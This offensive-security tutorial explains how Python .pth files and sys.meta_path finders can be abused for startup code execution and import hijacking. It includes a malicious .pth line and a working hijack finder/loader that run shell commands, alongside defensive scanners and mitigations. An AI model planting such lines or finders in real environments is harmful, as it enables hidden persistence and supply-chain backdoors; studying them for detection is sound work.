PyFu

Import System Abuse with .pth Files and sys.meta_path

Python-based Vulnerabilities Anatomy

Python’s import system is far more programmable than the import statement suggests, and that programmability is an attack surface in its own right. Two mechanisms in particular let attacker code run without the program ever explicitly importing it: .pth files, whose import lines are executed at interpreter startup, and sys.meta_path, which accepts a custom finder that intercepts imports across the whole process. The first is a persistence and supply-chain primitive; the second is a runtime hijacking primitive. Both abuse documented, intended features of CPython, which is exactly why they are quiet.

How CPython resolves an import

When you write import foo, the interpreter first checks the sys.modules cache. If foo is not there, it walks sys.meta_path, a list of finder objects, asking each one “can you locate foo?”. The default finders handle built-in modules, frozen modules, and path-based lookup across sys.path. The first finder that returns a spec wins, and its loader is asked to execute the module. The key insight for an attacker is that sys.meta_path is an ordinary, writable Python list: anything you put at the front of it is consulted before the real finders, on every uncached import for the rest of the process’s life.
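To make the lookup order concrete, here is a minimal sketch that lists the finders in the order the interpreter would consult them. The helper name describe_meta_path is made up for this illustration.

```python
import sys

def describe_meta_path():
    """Return a readable name for each finder on sys.meta_path, in lookup order."""
    names = []
    for finder in sys.meta_path:
        # The default finders are classes; custom finders are often instances.
        cls = finder if isinstance(finder, type) else type(finder)
        names.append(f"{cls.__module__}.{cls.__qualname__}")
    return names

if __name__ == "__main__":
    for position, name in enumerate(describe_meta_path()):
        print(position, name)
```

On a clean CPython 3.12 this typically shows three entries (BuiltinImporter, FrozenImporter, PathFinder). Tools such as test runners or packaging shims may legitimately add more, so the exact list depends on the environment.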

sys.path itself is assembled at startup, and part of that assembly is the site module processing .pth files, which is where the first technique lives.

Technique 1: weaponizing .pth files

A .pth file in a site-packages directory is normally a plain list of extra directories to add to sys.path. But the site module has a special, long-standing behavior: any line in a .pth file that begins with import followed by a space or tab is passed to exec() at interpreter startup. That single feature turns a text file dropped into site-packages into code execution on every python invocation that loads site, which is the default (python -S skips it).

# evil.pth, dropped into site-packages/
import os; os.system('id > /tmp/pth-pwned')

The line looks like an import, so it satisfies the .pth format, but the ; os.system(...) after it runs arbitrary code. Because site is imported automatically before your script’s first line, the payload fires before the target program does anything, with no entry in the program’s own source and nothing to see in its imports.
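The behavior can be reproduced without touching a real site-packages. The sketch below assumes that site.addsitedir() processes .pth files the same way interpreter startup does. It uses a throwaway directory and a harmless payload that only sets an environment variable. The function name and the marker variable are made up for the demo.

```python
import os
import site
import sys
import tempfile

def demo_pth_execution():
    """Show that site executes an 'import' line found in a .pth file."""
    marker = "PTH_DEMO_MARKER"  # hypothetical name, chosen for this demo
    os.environ.pop(marker, None)
    saved_path = list(sys.path)
    with tempfile.TemporaryDirectory() as tmp:
        pth_path = os.path.join(tmp, "demo.pth")
        with open(pth_path, "w", encoding="utf-8") as fh:
            # Starts with "import ", so site will exec() the whole line.
            fh.write(f"import os; os.environ[{marker!r}] = 'fired'\n")
        # Process the directory as a site directory, .pth files included.
        site.addsitedir(tmp)
    # addsitedir() also appended tmp to sys.path; restore the original list.
    sys.path[:] = saved_path
    return os.environ.get(marker)

if __name__ == "__main__":
    print(demo_pth_execution())
```

Nothing imports demo.pth by name; the line runs only because the file sits in a directory that site was asked to process.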

This is the mechanism behind persistent code execution on pip install: a malicious package’s build or install step writes a .pth into site-packages, and from then on every Python process in that environment runs the attacker’s line. It is also a clean local persistence trick: write one file, get executed by every future interpreter that uses that environment. See Python Packages and Python Virtual Environment for where these directories live and how environments isolate (or fail to isolate) them.

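Detection is straightforward once you know to look: enumerate every .pth file under your site-packages directories and flag any line that is not simply a path. Review the hits rather than treating them as verdicts, since some legitimate tooling (setuptools, for example) also ships import lines in .pth files. Defenders rarely audit .pth contents, which is what makes this durable.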
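A minimal sketch of that enumeration follows. It assumes the directories reported by site and sysconfig cover the environment you care about. The function names are made up for illustration, and each finding is a lead to read, not proof of compromise.

```python
import os
import site
import sysconfig

def executable_pth_lines(pth_path):
    """Yield (line_number, text) for lines that site would exec()."""
    # utf-8-sig strips a BOM so a leading marker cannot hide the first line.
    with open(pth_path, encoding="utf-8-sig", errors="replace") as fh:
        for number, line in enumerate(fh, start=1):
            # site executes lines starting with "import" plus a space or tab.
            if line.startswith(("import ", "import\t")):
                yield number, line.rstrip()

def candidate_site_dirs():
    """Collect the site-packages directories known to this interpreter."""
    paths = sysconfig.get_paths()
    dirs = {paths["purelib"], paths["platlib"]}
    dirs.update(site.getsitepackages())
    dirs.add(site.getusersitepackages())
    return sorted(d for d in dirs if d and os.path.isdir(d))

def scan(dirs):
    """Return (path, line_number, text) for every executable .pth line."""
    findings = []
    for directory in dirs:
        for name in sorted(os.listdir(directory)):
            if name.endswith(".pth"):
                path = os.path.join(directory, name)
                for number, text in executable_pth_lines(path):
                    findings.append((path, number, text))
    return findings

if __name__ == "__main__":
    for path, number, text in scan(candidate_site_dirs()):
        print(f"{path}:{number}: {text}")
```

Running it inside each virtual environment, not only the system interpreter, matters because every environment has its own site-packages.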

Technique 2: hijacking imports through sys.meta_path

Where .pth gives you startup execution, a sys.meta_path finder gives you control over what a running program receives when it imports a name. You write a finder that claims a target module, and your loader hands back code of your choosing, so the victim’s import of requests (or of any other module) returns your trojaned version instead of the real one.

import sys
from importlib.abc import MetaPathFinder, Loader
from importlib.util import spec_from_loader

class HijackLoader(Loader):
    def __init__(self, target):
        self.target = target

    def create_module(self, spec):
        return None  # use a normal module object

    def exec_module(self, module):
        # Attacker-controlled code runs as the imported module's body
        import os
        os.system('id > /tmp/meta-pwned')
        module.hijacked = True

class HijackFinder(MetaPathFinder):
    def __init__(self, target):
        self.target = target

    def find_spec(self, fullname, path, target=None):
        if fullname == self.target:
            return spec_from_loader(fullname, HijackLoader(self.target))
        return None  # let the real finders handle everything else

# Insert at the FRONT so it is consulted before the real finders
sys.meta_path.insert(0, HijackFinder('config'))

import config            # triggers HijackLoader.exec_module
print(config.hijacked)   # True

find_spec returns a spec only for the targeted name and None for everything else, so all other imports behave normally and nothing looks broken. When the program imports the targeted module, exec_module runs the attacker’s code as that module’s body. In a running process where you already have code execution (a deserialization gadget, an exec foothold), installing a meta-path finder is a powerful way to backdoor an import that has not happened yet, intercepting a security-relevant module the moment the application loads it. A module that is already in sys.modules is served from that cache and never reaches the finder, which is why the target has to be a future import.

What defenders should watch

Both techniques live in trusted, writable locations. For .pth, the control is integrity of site-packages: install only audited packages, review .pth files (any non-path line is suspicious), and prefer environments you can rebuild from a locked manifest. For sys.meta_path, the indicator is the list itself: snapshot sys.meta_path and sys.path_hooks early and alert on unexpected entries, since a legitimate application almost never prepends a custom finder at runtime.
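The snapshot idea can be sketched in a few lines. This assumes the baseline is taken early, before any untrusted code runs. The function names are made up for illustration, and code that already executes in the process could tamper with the check itself, so treat it as a tripwire and not a guarantee.

```python
import sys

def snapshot_import_hooks():
    """Capture the finders and path hooks present right now."""
    return {
        "meta_path": list(sys.meta_path),
        "path_hooks": list(sys.path_hooks),
    }

def unexpected_hooks(baseline):
    """Return entries present now that were absent from the baseline."""
    current_lists = {
        "meta_path": sys.meta_path,
        "path_hooks": sys.path_hooks,
    }
    report = {}
    for key, current in current_lists.items():
        known = baseline[key]
        # Compare by identity so look-alike objects cannot pass as known ones.
        extra = [obj for obj in current if not any(obj is k for k in known)]
        if extra:
            report[key] = extra
    return report

if __name__ == "__main__":
    baseline = snapshot_import_hooks()
    # ... application start-up would happen here ...
    print(unexpected_hooks(baseline))
```

Environments that legitimately install finders (test runners, editable installs) need those entries in the baseline, otherwise the check will be noisy.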

Tested on CPython 3.12.3. The takeaway: import resolution is user-programmable, so “the code never imports anything dangerous” is not a security property. A .pth line executes before the program starts, and a sys.meta_path finder decides what every future import returns. Runnable demonstrations are in generic-py-fu/import-abuse/ in the lab.

Running it in the lab

docker compose run --rm generic-py-fu python3 import-abuse/meta-path-hijack.py
=== sys.meta_path import hijack ===
meta_path entries before: 3
meta_path entries after insert: 4

Triggering: import config
[HijackFinder] claiming import of 'config'
[HijackLoader] exec_module running as body of 'config'

Proof of hijack:
  config.hijacked = True
  config.note     = this module object was supplied by the attacker's loader
Unaffected import still works: json.dumps({'ok': True}) -> {"ok": true}

Inserting a finder at the front of sys.meta_path intercepted import config and returned an attacker-built module, while unrelated imports passed through untouched.

Why import system abuse matters from an offensive security perspective

I reach for these techniques when I already have a foothold and want to keep it, or when I am attacking the supply chain rather than the running app. A .pth line buys me execution on every future interpreter in the environment with one dropped file and zero footprint in the program’s source; a sys.meta_path finder lets me decide what a running process receives the next time it imports a security-relevant module. Both abuse documented, intended CPython behavior, so they survive upgrades and rarely trip the controls a team has actually deployed. That quietness is the whole value: persistence and hijacking that look like ordinary packaging.

The reason this is a supply-chain favorite is that the .pth line fires before the program’s first line in every interpreter that starts in the environment, later pip runs included, and the meta-path finder backdoors imports that have not happened yet. Defenders almost never audit either, which is exactly why I do.

When I assess a Python environment, these are the tells I look for:

  • Non-path lines in .pth files. Any line under site-packages that begins with import (or carries a ; and a call) is code execution at startup, not a path entry. This is the single highest-value thing to enumerate.
  • sys.meta_path.insert(0, ...) or appends at runtime. A legitimate application almost never prepends a custom finder; an entry that was not there at a clean startup is a hijack indicator.
  • Writable site-packages or sys.path entries owned by the runtime user. Anything droppable there executes, so a world-writable or upload-reachable package directory is the precondition for both techniques.
  • MetaPathFinder/Loader subclasses and spec_from_loader in application code. Custom import machinery is rare in normal apps and worth reading whenever it appears.
  • Shadowing modules. A local config.py or similarly named file that masks an expected import is the low-tech cousin of the meta-path hijack.
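The shadowing check in the last bullet can be approximated by asking the import system where a name would resolve and comparing that location with the directories you expect. This is a sketch for top-level module names only. The function name and the idea of a trusted-roots list are assumptions made for illustration.

```python
import importlib
import importlib.util
import os

def origin_outside_roots(name, trusted_roots):
    """Return the file that importing `name` would load if it lies outside
    every trusted root, else None."""
    importlib.invalidate_caches()  # notice files created since the last lookup
    spec = importlib.util.find_spec(name)
    if spec is None or not spec.has_location:
        return None  # not found, or built-in/frozen with no file on disk
    origin = os.path.realpath(spec.origin)
    for root in trusted_roots:
        root = os.path.realpath(root)
        try:
            if os.path.commonpath([origin, root]) == root:
                return None  # resolves inside a trusted directory
        except ValueError:
            continue  # paths cannot be compared, e.g. different drives
    return origin

if __name__ == "__main__":
    import sysconfig
    stdlib = sysconfig.get_paths()["stdlib"]
    print(origin_outside_roots("json", [stdlib]))
```

A non-None result for a standard-library name, or for a dependency that should live in site-packages, means some earlier sys.path entry is answering for it and is worth reading.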

For defenders the takeaway is that “the code never imports anything dangerous” is not a security property: import resolution is user-programmable, so the control is integrity of every location Python loads from, not review of the application’s own imports.

Mitigation

The fix is to control who can write to anything Python imports from: site-packages, the .pth files inside it, and every directory on sys.path must be writable only by trusted accounts and never by the application’s runtime user or by an upload path, because a .pth file dropped there executes at interpreter startup and a module dropped there executes the next time its name is imported. Install dependencies from pinned, hash-verified sources, run the application as a user that cannot modify its own package directories, and monitor those locations for unexpected .pth files or shadowing modules as a tampering signal.
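One quick way to check the write-permission requirement is to run a probe as the application’s runtime user and list which import locations that user can modify. This is a minimal sketch with a made-up function name. It relies on os.access, which reports the current user’s effective permissions and says nothing about other accounts.

```python
import os
import sys

def writable_import_locations():
    """List sys.path directories the current user can write to."""
    writable = []
    for entry in sys.path:
        # An empty entry means the current working directory.
        directory = os.path.abspath(entry or os.getcwd())
        # Zip archives and missing paths are skipped by the isdir() check.
        if os.path.isdir(directory) and os.access(directory, os.W_OK):
            if directory not in writable:
                writable.append(directory)
    return writable

if __name__ == "__main__":
    for directory in writable_import_locations():
        print("writable:", directory)
```

Ideally the list is empty when run as the service account. Any directory it prints is a place where a dropped .pth file or shadowing module would be picked up.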